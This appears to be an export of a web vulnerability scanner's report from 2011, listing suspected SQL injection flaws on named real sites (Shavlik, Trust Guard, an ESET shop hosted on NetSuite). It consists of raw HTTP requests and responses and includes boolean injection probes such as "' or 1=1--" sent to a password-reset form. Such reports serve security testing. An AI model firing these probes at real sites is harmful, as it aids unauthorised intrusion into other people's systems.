HTTP/1.1 200 OK Connection: close Date: Mon, 25 Apr 2011 12:47:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8 ...[SNIP]... <!-- 0 372 --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Shavlik Free Antivirus Software Download</title> <link rel="stylesheet" href="style/style2.css" type="text/css" media="all" /> <!--[if IE 6]> <style> #navitem a {padding-bottom:0px;} </style> <![endif]--> <script language="javascript" type="text/javascript"> function windowOpen(sURL, bFade, sWindowName) { if (bFade) { document.getElementById( } sWindowName = sWindowName || "newWindow"; nPosX = (window.screen.width/2) - (400); nPosY = (window.screen.height/2) - (350 + 75); newWindow = window.open(sURL newWindow.focus(); } var req; function docLoad(url) { req = false; // non IE if(window.XMLHttpRequest && !(window.ActiveXObject)) { try { req = new XMLHttpRequest(); } catch(e) { req = false; } // IE } else if(window.ActiveXObject) { try { req = new ActiveXObject("Msxml2 } catch(e) { try { req = new ActiveXObject("Microso ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://learn.shavlik.com |
Path: | /shavlik/index.cfm |
GET /shavlik/index.cfm?m= User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: learn.shavlik.com Cookie: CFID=799689; CFTOKEN=67476078 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 25 Apr 2011 12:26:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8 ...[SNIP]... <font style="COLOR: black; FONT: 8pt/11pt verdana"> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND DMMESSAGE.userCompanyID = 21 ORDER BY DMMESSAGE.ID' at line 7 </font> ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=sjhj47er21 Expect: 100-continue Accept-Encoding: gzip, deflate Content-Length: 43 txtEmail=19563258'%20or%201%3d1-- |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 18:00:21 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <title>Trust Guard Login</title> <script type="text/javascript"> //<![CDATA[ document.getElements //]]> function TemplateOnUnload() { } </script> </head> <body style="background-color: <div style="text-align: center"> <center> <table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0"> <tr> <td style="background-image </td> </tr> <tr> <td align="center" style="vertical-align: middle; height: 23px;"></td> </tr> <tr> <td> <br /> <center> <div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid; width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;"> <form id="content:content" method="post" style="margin:0px" action="index.php"> <br /><br /> <script type="text/javascript"> function validateForm() { var message; var nouser = (!validatePresent var nopass = (!validatePresent if (nouser && nopass) message = 'Please enter a username and a password.'; else if (nouser) message = 'Please enter a username.'; else if (nopass) message = 'Please enter a password.'; ...[SNIP]... |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=sjhj47er21 Expect: 100-continue Accept-Encoding: gzip, deflate Content-Length: 43 txtEmail=19563258'%20or%201%3d2-- |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 18:00:21 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3795 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <title>Reset Password</title> <script type="text/javascript"> //<![CDATA[ document.getElements //]]> function TemplateOnUnload() { } </script> </head> <body style="background-color: <div style="text-align: center"> <center> <table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0"> <tr> <td style="background-image </td> </tr> <tr> <td align="center" style="vertical-align: middle; height: 23px;"></td> </tr> <tr> <td> <br /> <center> <div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid; width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;"> <form method="post" style="margin:0px"> Enter you email address or site name below and click Submit and we will send you a new password<br /> <input id="txtEmail" name="txtEmail" type="text" value="19563258' or 1=2-- " style="width:300px" onblur="validatePresent <div id="msg_email"> < <span style="color:Red"> <span id='lblResult' >Could not find an account will the site 19563258' or 1=2-- .</span> </span> <br /> <input id='btnSubmit' name='btnSubmit' type="submit" value="Submit" onclick="return validatePresent(document ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /app/site/query |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=42 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:53:12 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 1229872416:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 49047 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td> ...[SNIP]... |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=42 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:53:17 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -803915303:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 54942 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /app/site/query |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=41 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:50:31 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 233801274:73686F702D Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 213 document.write('Error\n'); <!-- 30 50% #10--> <!-- [ sh.j12.sv ] [ 2011.1.0.45 ]--> <!-- [ 438708 ] [ ] [ /app/site/query <!-- Not logging slo ...[SNIP]... |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=41 |
HTTP/1.1 302 Moved Temporarily Date: Mon, 25 Apr 2011 15:50:31 GMT Server: Apache Location: /s.nl?c=438708&n=1&sc=3 Expires: 0 NS_RTIMER_COMPOSITE: -1139576511:73686F70 Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=utf-8 |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /app/site/query |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=42 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:42:58 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 1121558865:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 49062 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td> ...[SNIP]... |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=42 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:43:03 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -2135675922:73686F70 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 54968 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /app/site/query |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=41 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:58:08 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 1229899696:73686F702 Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 213 document.write('Error\n'); <!-- 33 55% #10--> <!-- [ sh.j12.sv ] [ 2011.1.0.45 ]--> <!-- [ 438708 ] [ ] [ /app/site/query <!-- Not logging slo ...[SNIP]... |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=41 |
HTTP/1.1 302 Moved Temporarily Date: Mon, 25 Apr 2011 15:58:09 GMT Server: Apache Location: /s.nl?c=438708&n=1&sc=3 Expires: 0 NS_RTIMER_COMPOSITE: -2027335596:73686F70 Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite Set-Cookie: promocode=; domain=shopping.netsuite X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=utf-8 |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /app/site/query |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=41 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 16:22:05 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 1565681064:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 49112 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td> ...[SNIP]... |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=41 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 16:22:10 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -2135454365:73686F70 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 55027 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /app/site/query |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=42 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:34:00 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 Last-Modified: Mon, 25 Apr 2011 15:34:02 GMT NS_RTIMER_COMPOSITE: -804036611:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 4773 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow <script language='JavaScript' type='text/javascript'> ...[SNIP]... <!-- v=2011.1.0.45 reason=error --> ...[SNIP]... |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=42 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:34:07 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 341950918:73686F702D X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 55000 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /app/site/query |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=41 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:44:26 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -2027412727:73686F70 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 49126 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td> ...[SNIP]... |
POST /app/site/query Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 Origin: http://www.eset.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 Content-Length: 63 buyid=5051&Submit.x=41 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:44:32 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -101878775:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 54942 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /s.nl |
GET /s.nl?sc=3&c=438708&n=1 Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:27:33 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 1121445976:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 48758 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td> ...[SNIP]... |
GET /s.nl?sc=3&c=438708&n=1 Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:27:36 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 1121446402:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 54648 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /s.nl |
GET /s.nl?alias=&c=438708&n=1 Host: shopping.netsuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:28:51 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 233654826:73686F702D X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 48755 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td> ...[SNIP]... |
GET /s.nl?alias=&c=438708&n=1 Host: shopping.netsuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:28:52 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 233655032:73686F702D X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 54649 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://shopping.netsuite |
Path: | /s.nl |
GET /s.nl?alias=&c=438708&n=1 Host: shopping.netsuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
